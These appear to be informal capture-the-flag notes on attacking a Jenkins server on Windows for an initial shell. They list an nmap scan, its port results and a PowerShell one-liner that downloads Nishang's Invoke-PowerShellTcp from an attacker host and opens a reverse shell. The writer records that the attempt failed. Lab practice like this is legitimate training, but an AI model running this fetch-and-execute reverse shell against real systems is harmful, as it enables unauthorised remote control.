Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
the thing
- port scan
nmap -sV <ip>
- open :8080
- login using credentials
- jenkins version 2.190.1
- get nishang reverse shell
- run
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.185.230:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.185.230 -Port 443
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
simple webserver for website
3389/tcp open tcpwrapped
idk kev
8080/tcp open http Jetty 9.4.z-SNAPSHOT
jenkins webserver
Couldnt get past uploading reverse shell, couldnt load module after downloading